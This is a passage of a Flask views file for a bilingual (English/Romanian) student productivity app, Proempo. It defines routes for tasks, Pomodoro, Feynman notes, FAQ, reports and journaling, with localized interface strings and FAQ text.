open(csv_file_path, 'r') as f:\n\n reader = csv.reader(f, delimiter=',')\n epoch = datetime(2023, 10, 1)\n today = datetime.now()\n currentDay = (today - epoch).days\n num_lines = sum(1 for _ in reader)\n index = currentDay % num_lines\n f.seek(0)\n \n\n for i, row in enumerate(reader):\n if i == index:\n if(row[0] == \"\") :\n row[0] = \"Unknown Author\"\n qod = (row[1], row[0]) \n break\n else:\n qod = \"Error: Quote not found.\"\n\n return qod\n\n@app.route('/toggle_white_noise', methods=['POST'])\n@login_required\ndef toggle_white_noise():\n print(\"Form submitted\")\n # Handle the white noise play/pause action based on the form submission (your implementation)\n return redirect(url_for('views.home')) # Redirect back to the home page after handling the action\n\n\n\n\n\n\n@views.route('/help')\n@login_required\ndef help():\n print(current_user.language)\n if current_user.language == \"ro\":\n cSelfWork = \"Concentrare\"\n pomodoroDescription = \"Încercați tehnica Pomodoro pentru a vă crește productivitatea.\"\n flashcards = \"Carduri Flash\"\n flashcardsDescription = \"Folosiți carduri pentru a memora informații în mod eficient.\"\n create = \"Crează\"\n view = \"Arată\"\n feynmanDescription = \"Stăpânește subiecte complexe explicând-o unei entități mai mici în termeni simpli.\"\n iSelfWork = \"Munca De Sine\"\n accomplishments = \"Realizări\"\n prideDescription = \"Lucrează la sufletul tau interior enumerând lucruri care te fac să te simți mândru de tine.\"\n begin = \"Începe\"\n goals = \"Obiective\"\n goalsDescription = \"Enumerați-vă obiectivele pe termen lung pentru a vă ajuta să rămâneți concentrat pe ceea ce este important pentru dumneavoastră.\"\n meditation = \"Meditaţie\"\n meditationDescription = \"Găsiți pace și reduceți stresul prin respirație ghidată.\"\n youngEdition = \"Ediția Tânără\"\n collegeEdition = \"Ediția Pentru Colegiu\"\n else:\n cSelfWork = \"Concentration Self-Work\"\n pomodoroDescription = \"Try the Pomodoro Technique to boost your productivity.\"\n flashcards = \"Flashcards\"\n flashcardsDescription = \"Use flashcards to memorize information effectively.\"\n create = \"Create\"\n view = \"View\"\n feynmanDescription = \"Master complex subjects by explaining it to a smaller entity in simple terms.\"\n iSelfWork = \"Inner Self-Work\"\n accomplishments = \"Accomplishments\"\n prideDescription = \"Work on your inner self by listing things that make you feel proud of yourself.\"\n begin = \"Begin\"\n goals = \"Goals\"\n goalsDescription = \"List your long term goals to help you remain focused on what is important to you.\"\n meditation = \"Meditation\"\n meditationDescription = \"Find peace and reduce stress through paced breathing.\"\n youngEdition = \"Young Edition\"\n collegeEdition = \"College Edition\"\n return render_template(\"help.html\", user=current_user, cSelfWork=cSelfWork, pomodoroDescription=pomodoroDescription, \n flashcards=flashcards, flashcardsDescription=flashcardsDescription, create=create, view=view, \n feynmanDescription=feynmanDescription, iSelfWork=iSelfWork, accomplishments=accomplishments, \n prideDescription=prideDescription, begin=begin, goals=goals, goalsDescription=goalsDescription, \n meditation=meditation, meditationDescription=meditationDescription, youngEdition=youngEdition, collegeEdition=collegeEdition)\n\n@views.route('/feynman')\n@login_required\ndef feynman():\n latest_entry = Feynman.query.filter_by(user_id=current_user.id).order_by(Feynman.id.desc()).first()\n\n # Replacing newline characters with
tags for proper display in HTML\n if latest_entry:\n latest_entry.description = latest_entry.description.replace('\\n', '
')\n\n\n if current_user.language == \"ro\":\n title=\"Metoda Feynman\"\n question=\"Cum încep?\"\n writeTitle= \"Scrie titlul aici\"\n writeDescription=\"Scrie descrierea aici\"\n startNew = \"începe Nou\"\n RememberThoughts=\"Salvează-mi gândurile pentru data viitoare\"\n explanation1=\"Metoda Feynman are 4 pași simpli:\"\n explanation2=\"După ce ați studiat subiectul, începeți să îl scrieți într-un limbaj simplu. Gândiți-vă la asta ca la explicarea subiectului ales unui copil mic. Dacă există lacune în înțelegerea dvs., completați-le și încercați din nou. Ideea principală este că, dacă nu reușiți să-l explicați simplu, nu îl înțelegeți suficient de bine și aveți nevoie de mai multă practică.\"\n explanation3=\"Acum, închideți fereastra asta și începeți.\"\n else:\n title=\"Feynman Method\"\n question=\"How do I begin?\"\n writeTitle=\"Write topic here\"\n writeDescription=\"Write description here\"\n startNew = \"Start New\"\n RememberThoughts =\"Remember my thoughts for next time\"\n explanation1=\"The Feynman Method has 4 easy steps\"\n explanation2=\"After studying your topic, begin writing it down in simple language. Think of it as explaining your choosen topic to a toddler. If there are gaps in your understanding, fill them in and try again. The core point is that if you are unable to explain it simply, you don't understand it well enough and need more practice.\"\n explanation3=\"Now, close this popup and begin.\"\n\n return render_template(\"feynman.html\", user=current_user, latest_entry=latest_entry, \n title=title, question=question, writeTitle=writeTitle, writeDescription=writeDescription, startNew=startNew,\n RememberThoughts=RememberThoughts, explanation1=explanation1, explanation2=explanation2, explanation3=explanation3)\n\n@views.route('/start-new-entry', methods=['POST'])\n@login_required\ndef start_new_entry():\n new_feynman_entry = Feynman(user_id=current_user.id, title='', description='')\n db.session.add(new_feynman_entry)\n db.session.commit()\n\n return redirect(url_for('views.feynman'))\n\n\n@views.route('/save-data', methods=['POST'])\n@login_required\ndef save_data():\n data = request.get_json()\n title = data.get('title')\n description = data.get('description')\n\n # Save the data to the database for the current user\n new_feynman_entry = Feynman(\n user_id=current_user.id,\n title=title,\n description=description\n )\n\n db.session.add(new_feynman_entry)\n db.session.commit()\n\n return jsonify({'message': 'Data saved successfully'})\n\n@views.route('/pomodoro')\n@login_required\ndef pomodoro():\n task_id = request.args.get('taskId')\n task_data = request.args.get('taskData')\n uncompleted_tasks = Task.query.filter_by(user_id=current_user.id).all()\n\n if current_user.language == \"ro\":\n title=\"Ceas Pomodoro\"\n start=\"Începe\"\n pause=\"Pauză\"\n reset=\"Resetă\"\n workTime=\"Timp de muncit (min)\"\n shortBreak=\"Pauză mică (min)\"\n longBreak=\"Pauză lungă (min)\"\n task = \"În această sesiune voi lucra la:\"\n question=\"Ce este Pomodoro?\"\n explanation1=\"Tehnica Pomodoro este o metodă de gestionare a timpului care folosește un cronometru pentru a descompune munca în intervale.\"\n explanation2=\"5 pași simpli:\"\n explanation3=\"1. Decideți asupra sarcinii pe care trebuie să o faceți\"\n explanation4=\"2. Setați timpul de lucru la 25 de minute (reglabil)\"\n explanation5=\"3. Lucrați la sarcina stabilită până când sună cronometrul\"\n explanation6=\"4. Luați o scurtă pauză de 5 minute (reglabilă)\"\n explanation7=\"5. După 4 sesiuni, luați o pauză mai lungă.\"\n else: \n title=\"Pomodoro Timer\"\n start=\"Start\"\n pause=\"Pause\"\n reset=\"Reset\"\n workTime=\"Work Time (min)\"\n shortBreak=\"Short Break (min)\"\n longBreak=\"Long Break (min)\"\n question=\"What is Pomodoro?\"\n explanation1=\"The Pomodoro Technique is a time management method that uses a timer to break down work in intervals.\"\n explanation2=\"5 easy steps:\"\n explanation3=\"1. Decide on the task that you need to do\"\n explanation4=\"2. Set the work time to 25 minutes (adjustable)\"\n explanation5=\"3. Work on the set task until the timer rings\"\n explanation6=\"4. Take a short 5 minute break (adjustable)\"\n explanation7=\"5. After 4 cycles, take a longer break.\"\n\n return render_template('pomodoro.html', task_id=task_id, task_data=task_data, user=current_user, uncompleted_tasks=uncompleted_tasks, \n title=title, start=start, pause=pause, reset=reset, workTime=workTime, shortBreak=shortBreak, longBreak=longBreak, \n question=question, explanation1=explanation1, explanation2=explanation2, explanation3=explanation3, explanation4=explanation4, \n explanation5=explanation5, explanation6=explanation6, explanation7=explanation7)\n\n\n@views.route('/FAQ')\n@login_required\ndef faq():\n if current_user.language == \"ro\":\n accordion_items = [\n {\n \"id\": \"section1\",\n \"title\": \"Începerea\",\n \"content\": \"\",\n \"nested_items\": [\n {\"id\": \"nested1\", \"title\": \"Există un tutorial sau un proces de inițiere care să mă ajute să navighez în aplicație pentru prima dată?\", \"content\": \"Ne pare rău, site-ul web nu oferă niciun tutorial sau nu oferă niciun proces.\"},\n {\"id\": \"nested2\", \"title\": \"Care este modelul de preț pentru site-ul dvs.? Există versiuni gratuite sau de încercare disponibile?\", \"content\": \"Acest site este gratuit, nu există un model de preț sau versiuni de încercare.\"},\n {\"id\": \"nested3\", \"title\": \"Ce este tehnica pomodoro? Cum o pot utiliza pe site?\", \"content\": \"Tehnica pomodoro este o metodă de gestionare a timpului bazată pe sesiuni de lucru concentrate de 25 de minute întrerupte de pauze de cinci minute. Puteți utiliza această tehnică în pagina de Ajutor personal.\"},\n {\"id\": \"nested4\", \"title\": \"Ce este tehnica Feynman? Cum o pot utiliza pe site?\", \"content\": \"Tehnica Feynman este un proces în patru pași pentru înțelegerea oricărui subiect. Ea respinge reținerea automată în favoarea înțelegerii autentice obținute prin selecție, cercetare, scriere, expunere și rafinare. Puteți găsi această tehnică în pagina de Ajutor personal.\"},\n {\"id\": \"nested5\", \"title\": \"Ce este zgomotul alb? Cum mă poate ajuta zgomotul alb în timp ce utilizez acest site?\", \"content\": \"Zgomotul alb este un sunet constant și uniform care conține putere egală la toate frecvențele auzibile. Vă poate ajuta prin mascarea zgomotului de fundal, îmbunătățirea concentrării și a atenției și crearea unui mediu sonor constant.\"},\n {\"id\": \"nested6\", \"title\": \"Unde pot să merg pentru a lua legătura cu suportul dacă nu sunt disponibile problemele listate pe pagină?\", \"content\": \"Puteți vizita pagina de Suport din bara de navigație și să vă listați problemele acolo.\"}\n ],\n },\n {\n \"id\": \"section2\",\n \"title\": \"Sănătatea Mintală\",\n \"content\": \"\",\n \"nested_items\": [\n {\"id\": \"nested8\", \"title\": \"Care este relația dintre sănătatea mintală și productivitate?\", \"content\": \"Starea sănătății mintale și nivelul de productivitate au o relație foarte strânsă, însă mulți oameni aleg să ignore această relație. Sănătatea mintală constă în multe aspecte, cum ar fi stresul, anxietatea și depresia. De obicei, o persoană care se confruntă cu aceste provocări va avea niveluri mai scăzute de implicare, creativitate și rezolvare a problemelor. Proempo încearcă să mențină o relație pozitivă între aceste două aspecte ale vieții.\"},\n {\"id\": \"nested9\", \"title\": \"Cum mă va ajuta Proempo să gestionez stresul și anxietatea?\", \"content\": \"Ca studenți, noi, la Proempo, avem multă empatie față de oamenii care luptă să-și controleze gândurile și sunt foarte stresați din cauza termenelor limită. Organizarea vieții tale este un mod excelent de a începe să faci față stresului și/sau anxietății. Păstrând toate activitățile, temele școlare sau pur și simplu notele și amintirile generale într-un loc central ușor accesibil. Acest lucru va arăta cât timp ai pentru a face aceste sarcini. Te vei simți în siguranță văzând că ai completat sarcinile. Proempo oferă și o secțiune de jurnalizare pentru a ajuta cu anxietatea trăită în viața ta de zi cu zi.\"},\n {\"id\": \"nested10\", \"title\": \"Care este scopul jurnalizării?\", \"content\": \"Jurnalizarea este o activitate excelentă pentru a te ajuta pe tine însuți. În timpul jurnalizării, nu există factori externi de care să-ți faci griji, în afara lui „Eu, eu și eu”. Acesta este un spațiu sigur în care poți elibera toate gândurile și sentimentele acumulate pe o pagină. Pe măsură ce trece timpul, vei avea multe jurnale care îți vor arăta cum te-ai simțit într-o zi anume și motivul pentru care acea zi a avut acel rezultat. Privind înapoi la aceste jurnale, vei vedea cât de mult te-ai dezvoltat ca persoană și vei învăța din trecutul tău.\"},\n {\"id\": \"nested11\", \"title\": \"Ce este epuizarea și ce trebuie să fac dacă o experimentez?\", \"content\": \"Epuizarea este o stare de oboseală fizică și/sau emoțională care poate afecta identitatea cuiva și sentimentul de a fi realizat. Pașii pentru a reduce epuizarea încep cu căutarea de sprijin din partea membrilor familiei sau colegilor pentru a vă ajuta să colaborați și să faceți față a ceea ce simțiți. Puteți să încercați să vă dedicați timp unei activități sau hobby pe care îl apreciați și care vă relaxează sau chiar să faceți exerciții. „Leacul” pentru epuizare constă în a lua o pauză de la muncă sau școală sau de la alte factori care ar putea cauza această stare.\"},\n {\"id\": \"nested12\", \"title\": \"Unde pot să merg pentru a cere ajutor?\", \"content\": \"Dacă aveți nevoie de ajutor serios sau de suport dincolo de serviciile noastre, iată câteva resurse pe care le puteți verifica: Linia de viață pentru suicid și criză: 988, Terapie.\"}\n ],\n },\n {\n \"id\": \"section3\",\n \"title\": \"Productivitate\",\n \"content\": \"\",\n \"nested_items\": [\n {\"id\": \"nested13\", \"title\": \"Ce funcționalități oferă site-ul pentru a îmbunătăți productivitatea?\", \"content\": \"Funcționalitățile oferite pe site sunt metoda pomodoro și tehnica Feynman, ambele fiind disponibile în pagina de Ajutor personal.\"},\n {\"id\": \"nested14\", \"title\": \"Puteți oferi sfaturi pentru stabilirea și atingerea obiectivelor de productivitate?\", \"content\": \"Sfaturile noastre pentru utilizarea acestui site în stabilirea și atingerea obiectivelor includ crearea de sarcini, utilizarea metodei pomodoro, crearea de carduri cu întrebări și realizarea de pauze pentru a preveni epuizarea.\"},\n {\"id\": \"nested15\", \"title\": \"Cum joacă gestionarea timpului un rol în productivitate? Poate site-ul dvs. să ajute în acest sens?\", \"content\": \"Gestionarea timpului joacă un rol crucial în productivitate, ajutând persoanele să-și prioritizeze sarcinile, să aloce timp eficient și să minimizeze distragerile. O gestionare eficientă a timpului permite o mai bună organizare și le permite persoanelor să realizeze mai mult în mai puțin timp, ceea ce duce la o productivitate mai mare. Site-ul nostru poate oferi utilizatorilor crearea unei sarcini în pagina de sarcini, utilizarea metodei pomodoro pentru a seta un cronometru, împreună cu finalizarea sarcinilor create din pagina de sarcini, crearea de carduri cu întrebări în pagina de Ajutor personal, etc. Vă rugăm să verificați pagina de Ajutor personal dacă doriți să vă îmbunătățiți productivitatea.\"},\n {\"id\": \"nested16\", \"title\": \"Care sunt câteva strategii pentru a învinge procrastinarea și a menține concentrarea?\", \"content\": \"Site-ul nostru poate lista câteva strategii. Descompuneți sarcinile în pași mai mici. Stabiliți obiective specifice și realizabile. Utilizați un cronometru pentru muncă concentrată, precum metoda pomodoro. Minimizați distragerile cu ajutorul player-ului nostru de zgomot alb încorporat. Răsfățați-vă pentru finalizarea sarcinilor. Creați un spațiu de lucru dedicat. Prioritizați sarcinile în funcție de importanță și urgență.\"},\n {\"id\": \"nested17\", \"title\": \"Cum pot să prioritizez eficient sarcinile și proiectele pentru a-ți optimiza productivitatea?\", \"content\": \"Puteți prioritiza sarcinile utilizând steaua ca o modalitate de a vă favoriza sarcinile, personalizarea suplimentară este disponibilă în setări. În ceea ce privește proiectele, deocamdată nu oferim nimic pentru prioritizarea proiectelor pe site.\"},\n {\"id\": \"nested18\", \"title\": \"Cum pot să urmăresc progresul și să măsurăm câștigurile de productivitate folosind site-ul?\", \"content\": \"Puteți urmări progresul pe site cu ajutorul graficelor și diagramele furnizate pentru a măsura progresul dvs. actual de productivitate.\"}\n ],\n },\n]\n FAQtitle = \"Întrebări frecvente\"\n subtitle = \"Dacă aveți alte întrebări, vă rugăm să consultați celelalte secțiuni de mai jos.\"\n else:\n accordion_items = [\n {\n \"id\": \"section1\",\n \"title\": \"Getting Started\",\n \"content\": \"\",\n \"nested_items\": [\n {\"id\": \"nested1\", \"title\": \"Is there a tutorial or onboarding process to help me navigate the application for the first time?\", \"content\": \"Sorry, the website doesn't provide any tutorial or offer any process.\"},\n {\"id\": \"nested2\", \"title\": \"What is the pricing model for your website? Are there any free or trial versions available?\", \"content\": \"This website is free, there is no pricing model nor any trial versions.\"},\n {\"id\": \"nested3\", \"title\": \"What is the pomodoro technique? How can I use it on the website?\", \"content\": \"The pomodoro technique is a time management method based on 25-minute stretches of focused work broken by five-minute breaks. You can use the technique located in the Self-Help page.\"},\n {\"id\": \"nested4\", \"title\": \"What is the feynman technique? How can I use it on the website?\", \"content\": \"The feynman technique is a four-step process for understanding any topic. It rejects automated recall in favor of true comprehension gained through selection, research, writing, explaining, and refining. You can find it located in the self-help page.\"},\n {\"id\": \"nested5\", \"title\": \"What is white noise? How can white noise help me while using this website?\", \"content\": \"White noise is a consistent and uniform sound that contains equal power across all audible frequencies. It can help you by masking background noise, improving focus and concentration, and having a consistent sound environment.\"},\n {\"id\": \"nested6\", \"title\": \"Where can I go to contact support if any of the issues listed in the page aren't available?\", \"content\": \"You can visit the Support page in the navigation bar and list your issues there.\"}\n ],\n },\n {\n \"id\": \"section2\",\n \"title\": \"Mental Health\",\n \"content\": \"\",\n \"nested_items\": [\n {\"id\": \"nested8\", \"title\": \"What is the relationship between mental health and productivity?\", \"content\": \"The state of your mental health and how productive you are, have a very interconnected relationship but, many people choose to ignore this relationship. Mental health consists of many things such as stress, anxiety, and depression. Typically, someone who has any of these challenges will experience lower levels of engagement, creativity and problem solving. Proempo looks keep a positive relationship between these two factors of life.\"},\n {\"id\": \"nested9\", \"title\": \"How will Proempo help me manage my stress and anxiety?\", \"content\": \"As students, here at Proempo, we have a lot of empathy towards people struggling to control their thoughts and are very stressed about deadlines. Organizing your life is a great way to get started with handling your stress and/or anxiety. By keeping all your activities, schoolwork, or just general notes and reminders in one centrally located place that is easily accessible. Having this will layout how much time you have to do these tasks. You will be at ease seeing that your tasks are completed. Proempo also offers a journaling section to help with anxiety experienced in your everyday life.\"},\n {\"id\": \"nested10\", \"title\": \"What is the point of journaling?\", \"content\": \"Journalling is a great activity to help yourself. While journaling there are no outside factors to worry about except “Me, myself and I”. This is a safe space where you can heave all your pent-up thoughts and feelings onto a page. As time goes on you will have many journals telling you how you felt during a particular day and the reason that day followed that outcome. Looking back at these journals will show you how much you have developed as a person and learn from your past self.\"},\n {\"id\": \"nested11\", \"title\": \"What is burnout and what to do if I experience it?\", \"content\": \"Burnout is a state of physical and/or emotional exhaustion that can come to effect someone’s identity and sense of feeling accomplished. Steps to help reduce burnout starts with seeking support from family members or colleagues to help you collaborate and cope with what you are feeling. You could go ahead and try an activity or hobby you really enjoy that gets you relaxed or even exercise. The “cure” to burnout is taking a break from either work or school or other factors that might be causing this.\"},\n {\"id\": \"nested12\", \"title\": \"Where can I go to seek support?\", \"content\": \"If in need of serious help or support beyond our services, here are some resources to look into: Suicide and Crisis lifeline: 988, Therapy.\"}\n \n ],\n },\n {\n \"id\": \"section3\",\n \"title\": \"Productivity\",\n \"content\": \"\",\n \"nested_items\": [\n {\"id\": \"nested13\", \"title\": \"What features does the website offer to enhance productivity?\", \"content\": \"The features offered in the website are the pomodoro method, feynman technique, which are both located in the self-help page.\"},\n {\"id\": \"nested14\", \"title\": \"Can you provide tips for settings and achieving productivity goals?\", \"content\": \"Our tips to utilizing this website for setting and achieving goals are creating tasks, using the pomodoro method, creating flashcards, and taking a break to prevent burnout.\"},\n {\"id\": \"nested15\", \"title\": \"How does time management play a role in productivity? Can your website assist with this?\", \"content\": \"Time management plays a crucial role in productivity by helping individuals prioritize tasks, allocate time efficiently, and minimize distractions. Effective time management enables better organization and allows individuals to accomplish more in less time, leading to increased productivity. Our website can offer users with creating a task withing the tasks page, using the pomodoro method to set a timer along with completing the tasks created from the task page, creating flashcards in the self-help page, etc. Please check the self-help page if you want to enhance your productivity.\"},\n {\"id\": \"nested16\", \"title\": \"What are some strategies for overcoming procrastination and maintaining focus?\", \"content\": \"Our website can list some strategies. Break tasks into smaller steps. Set specific, achievable goals. Use a timer for focused work like the pomodoro method. Minimize distractions with our built-in white noise player. Reward yourself for completing tasks. Create a dedicated workspace. Prioritize tasks based on importance and urgency.\"},\n {\"id\": \"nested17\", \"title\": \"how can I effectively priortize tasks and projects to optimize my productivity?\", \"content\": \"You can priortize tasks by using the star as a way to favorite tasks, further customization is available in the settings. As for projects, we don't offer anything to priortize projects on the website for now.\"},\n {\"id\": \"nested18\", \"title\": \"How can I track my progress and measure my productivity gains using the website?\", \"content\": \"You can track progress in the website with the provided graphs and charts to measure your current productivity progress.\"},\n ],\n },\n \n ]\n FAQtitle = \"Frequently Asked Questions\"\n subtitle = \"If you have other questions, please check out the other sections below.\"\n return render_template(\"FAQ.html\", user=current_user, accordion_items=accordion_items, FAQtitle=FAQtitle, subtitle=subtitle)\n\n\n\n@views.route('/bearMeditation')\n@login_required\ndef bearMeditation():\n return render_template(\"bearMeditation.html\", user=current_user)\n\n@views.route('/regularMeditation')\n@login_required\ndef regularMeditation():\n return render_template(\"regularMeditation.html\", user=current_user)\n\n@views.route('/tasks', methods=['GET', 'POST'])\n@login_required\ndef tasks():\n if current_user.language == \"ro\":\n taskTitle = \"Sarcini\"\n dueDate = \"Data Scadenței: (Opțional)\"\n dueTime = \"Timp Cuvenit: (Opțional)\"\n taskEnter = \"Sarcină:\"\n taskButton = \"Adăugați o Sarcină\"\n congrats1 = \"Felicitări! Nu ai sarcini!\"\n congrats2 = \"Faceți o nouă sarcină mai sus.\"\n taskDueDate = \"Data Scadenței:\"\n at = \"la\"\n archiveTaskButton = \"Sarcini Arhivate\"\n sortBy = \"Filtrează după\"\n oldToNew = \"De la cel mai vechi la cel mai nou\"\n newToOld = \"De la cel mai nou la cel mai vechi\"\n sortDueDate = \"Data Scadenței\"\n alphabetically = \"Alfabetic\"\n sortDefault = \"(Mod Implicit)\"\n else:\n taskTitle = \"Tasks\"\n dueDate = \"Due Date: (Optional)\"\n dueTime = \"Due Time: (Optional)\"\n taskEnter = \"Task:\"\n taskButton = \"Add Task\"\n congrats1 = \"Congratulations! You have no tasks!\"\n congrats2 = \"Make a new task above.\"\n taskDueDate = \"Due Date:\"\n at = \"at\"\n archiveTaskButton = \"Archived Tasks\"\n sortBy = \"Sort by\"\n oldToNew = \"Oldest to Newest\"\n newToOld = \"Newest to Oldest\"\n sortDueDate = \"Due Date\"\n alphabetically = \"Alphabetically\"\n sortDefault = \"(Default)\"\n\n if request.method == 'POST':\n task_data = request.form.get('task') # Gets the task from the HTML\n due_date_str = request.form.get('dueDate') # Gets the due date string\n due_time_str = request.form.get('dueTime') # Gets due time\n\n if len(task_data) < 1:\n flash('You must enter a task!', category='error')\n elif due_time_str and not due_date_str:\n flash('You cannot have a due time without choosing a due date!', category='error')\n else:\n due_date = None # Default to None if no due date is provided\n due_time = None\n if due_date_str:\n due_date = datetime.strptime(due_date_str, '%Y-%m-%d').date()\n\n if due_time_str:\n due_time = datetime.strptime(due_time_str, '%H:%M').time()\n\n new_task = Task(\n data=task_data,\n due_date=due_date,\n due_time=due_time,\n user_id=current_user.id\n )\n\n db.session.add(new_task) # Add the task to the database\n db.session.commit()\n flash('Task added!', category='success')\n\n selected_sort = request.args.get('sort_method', 'default')\n\n user_id = current_user.id\n\n if selected_sort == 'due_date':\n tasks = Task.query.filter(Task.user_id == user_id).order_by(Task.due_date, Task.due_time)\n elif selected_sort == 'data':\n tasks = Task.query.filter(Task.user_id == user_id).order_by(func.lower(Task.data))\n elif selected_sort == 'newest':\n tasks = Task.query.filter(Task.user_id == user_id).order_by(Task.date.desc())\n elif selected_sort == 'oldest':\n tasks = Task.query.filter(Task.user_id == user_id).order_by(Task.date)\n else:\n tasks = Task.query.filter(Task.user_id == user_id).order_by(text(current_user.defaultsort))\n\n\n return render_template('tasks.html', user=current_user, dueDate=dueDate, dueTime=dueTime, taskTitle=taskTitle, \n tasks=tasks, taskEnter=taskEnter, taskButton=taskButton, congrats1=congrats1, congrats2=congrats2, \n taskDueDate=taskDueDate, at=at, archiveTaskButton=archiveTaskButton, sortBy=sortBy, selected_sort=selected_sort,\n oldToNew=oldToNew, newToOld=newToOld, sortDueDate=sortDueDate, alphabetically=alphabetically, sortDefault=sortDefault)\n\n\n@views.route('/archivedtasks')\n@login_required\ndef archivedtasks():\n if current_user.language == \"ro\":\n noArchivedTasks = \"Nimic aici...\"\n archiveWarning = \"Sigur doriți să ștergeți definitiv această sarcină? Odată ce o sarcină este ștearsă, aceasta nu va mai fi luată în considerare în statisticile și graficele dvs. Vă recomandăm să nu ștergeți sarcini decât dacă doriți cu adevărat.\"\n else:\n noArchivedTasks = \"Nothing Here...\"\n archiveWarning = \"Are you sure you want to permanently delete this task? Once a task is deleted it will no longer be factored into your statistics and charts. We recommend not deleting tasks unless you really want to.\"\n archivedtasks = ArchivedTask.query.filter_by(user_id=current_user.id).order_by(ArchivedTask.date).all()\n return render_template('archivedtasks.html', archivedtasks=archivedtasks, noArchivedTasks=noArchivedTasks, archiveWarning=archiveWarning, user=current_user)\n \n\n\n@views.route('/reports')\n@login_required\ndef reports():\n if current_user.language == \"ro\":\n reportsTitle = \"Rapoarte\"\n\n else:\n reportsTitle = \"Reports\"\n #code for the first graph on page\n end_date = datetime.now()\n start_date = end_date - timedelta(days=6) \n finished_tasks_data = (\n db.session.query(\n func.strftime('%Y-%m-%d', FinishedTask.date).label('date'),\n func.count(FinishedTask.id).label('finished_count')\n )\n .filter(FinishedTask.user_id == current_user.id)\n .filter(FinishedTask.date >= start_date)\n .filter(FinishedTask.date <= end_date)\n .group_by(func.strftime('%Y-%m-%d', FinishedTask.date))\n .all()\n )\n archived_tasks_data = (\n db.session.query(\n func.strftime('%Y-%m-%d', ArchivedTask.date).label('date'),\n func.count(ArchivedTask.id).label('finished_count')\n )\n .filter(ArchivedTask.user_id == current_user.id)\n .filter(ArchivedTask.date >= start_date)\n .filter(ArchivedTask.date <= end_date)\n .group_by(func.strftime('%Y-%m-%d', ArchivedTask.date))\n .all()\n )\n data_dict = {}\n current_day = start_date\n while current_day <= end_date:\n formatted_date = current_day.strftime('%Y-%m-%d')\n data_dict[formatted_date] = 0 # Initialize all days with zero completed tasks\n current_day += timedelta(days=1)\n\n for row in finished_tasks_data:\n date_str = row.date\n data_dict[date_str] = row.finished_count\n\n for row in archived_tasks_data:\n date_str = row.date\n data_dict[date_str] += row.finished_count\n\n\n finished_tasks_list = [{'date': date, 'finished_count': count} for date, count in data_dict.items()]\n finished_tasks_json = json.dumps(finished_tasks_list)\n\n # Query to find the most popular day-rating\n most_popular_day_rating = (\n db.session.query(Journal.day_rating, func.count().label('count'))\n .filter(Journal.user_id == current_user.id)\n .group_by(Journal.day_rating)\n .order_by(func.count().desc())\n .limit(1)\n .first()\n )\n\n most_popular_rating = most_popular_day_rating[0] if most_popular_day_rating else \"No data available\"\n # !!!!! need to handle what happens when there is a tie\n\n\n\n\n # Code for the second visualization\n goals_count = Goal.query.filter(\n and_(Goal.user_id == current_user.id, Goal.status == \"C\")\n ).count()\n\n latest_completed_goals = Goal.query.filter(\n and_(Goal.user_id == current_user.id, Goal.status == \"C\")\n ).order_by(Goal.date.desc()).limit(3).all()\n\n day_ratings = Journal.query.filter_by(user_id=current_user.id).with_entities(Journal.date, Journal.day_rating).all()\n\n # Map day ratings to numerical values\n converted_ratings = {'horrible': 1, 'bad': 2, 'good': 3, 'excellent': 4}\n day_rating_data = [{'date': str(date), 'rating': converted_ratings.get(rating.lower(), 0)} for date, rating in day_ratings]\n\n day_rating_json = json.dumps(day_rating_data)\n print(day_rating_json)\n\n\n\n if current_user.language == \"ro\":\n chart1Title=\"Sarcinile pe care le-am finalizat în această săptămână\"\n goalsAchieved=\"Obiective Realizate\"\n latestCompletedGoals=\"Ultimele obiective îndeplinite\"\n mostFrequentDayRating=\"Evaluarea mea cea mai frecventă de zi\"\n myHistory=\"Istoricul evaluării zilei mele\"\n noDayRatings=\"Se pare că nu ați înregistrat nicio evaluare zilnică. Vă rugăm să adăugați aceste date pentru a vă putea genera raportul.\"\n no_goals_message=\"Se pare că nu ți-ai stabilit niciun obiectiv.\"\n dayHistory = \"Istoricul evaluării zilei mele\"\n else:\n chart1Title=\"Amount of tasks I completed this week\"\n goalsAchieved=\"Goals Achieved\"\n latestCompletedGoals = \"Latest Completed Goals\"\n mostFrequentDayRating=\"My most frequent day rating\"\n myHistory=\"My Day Rating History\"\n noDayRatings=\"It appears that you have not logged any day ratings. Please add this data so that we can generate your report.\"\n no_goals_message=\"It appears as if you have not set any goals.\"\n dayHistory = \"My Day Rating History\"\n if goals_count > 0:\n return render_template(\"reports.html\", user=current_user, reportsTitle=reportsTitle, finished_tasks=finished_tasks_json, goals_count=goals_count, latest_completed_goals=latest_completed_goals, most_popular_rating=most_popular_rating, day_rating_json=day_rating_json, \n chart1Title=chart1Title, goalsAchieved=goalsAchieved, latestCompletedGoals=latestCompletedGoals,\n mostFrequentDayRating=mostFrequentDayRating, myHistory=myHistory, noDayRatings=noDayRatings, dayHistory=dayHistory)\n else:\n return render_template(\"reports.html\", user=current_user, reportsTitle=reportsTitle, finished_tasks=finished_tasks_json, goals_count=goals_count, no_goals_message=no_goals_message, most_popular_rating=most_popular_rating, day_rating_json=day_rating_json, \n chart1Title=chart1Title, goalsAchieved=goalsAchieved, latestCompletedGoals=latestCompletedGoals,\n mostFrequentDayRating=mostFrequentDayRating, myHistory=myHistory, noDayRatings=noDayRatings, dayHistory=dayHistory)\n\n\n@views.route('/journal', methods=['GET', 'POST'])\n@login_required\ndef journal():\n selected_entry = None #Initialize selected_entry to None\n if current_user.language == \"ro\":\n journalTitle = \"Verificare Zilnică\"\n journalSelect = \"Selectați o intrare anterioară:\"\n journalChoose = \"Selectați o intrare\"\n journalButton = \"Aplică\"\n journalDate = \"Data:\"\n dearJournal = \"Draga Jurnalule,\"\n journalContent = \"Astăzi, mi-am petrecut ziua gândindu-mă la...\"\n gratefulContent = \"3 lucruri pentru care sunt recunoscător astăzi sunt:\"\n dayTitle = \"Ziua mea a fost...\"\n rating_excellent = \"Excelent\"\n rating_good = \"Bun\"\n rating_bad = \"Rău\"\n rating_horrible = \"Oribil\"\n saveJournal = \"Salvați\"\n journalFooter = \"Ceea ce este în mintea ta?\"\n else:\n journalTitle = \"Daily Check-In\"\n journalSelect = \"Select a previous entry:\"\n journalChoose = \"Select an entry\"\n journalButton = \"Go\"\n journalDate = \"Date:\"\n dearJournal = \"Dear Journal,\"\n journalContent = \"Today, I spent my day thinking about...\"\n gratefulContent = \"3 things I am grateful for today are:\"\n dayTitle = \"My day was...\"\n rating_excellent = \"Excellent\"\n rating_good = \"Good\"\n rating_bad = \"Bad\"\n rating_horrible = \"Horrible\"\n saveJournal = \"Save Entry\"\n journalFooter = \"What is on your mind?\"\n today = datetime.now().date()\n entry_for_today = Journal.query.filter(Journal.date == today, Journal.user_id == current_user.id).first()\n if entry_for_today:\n 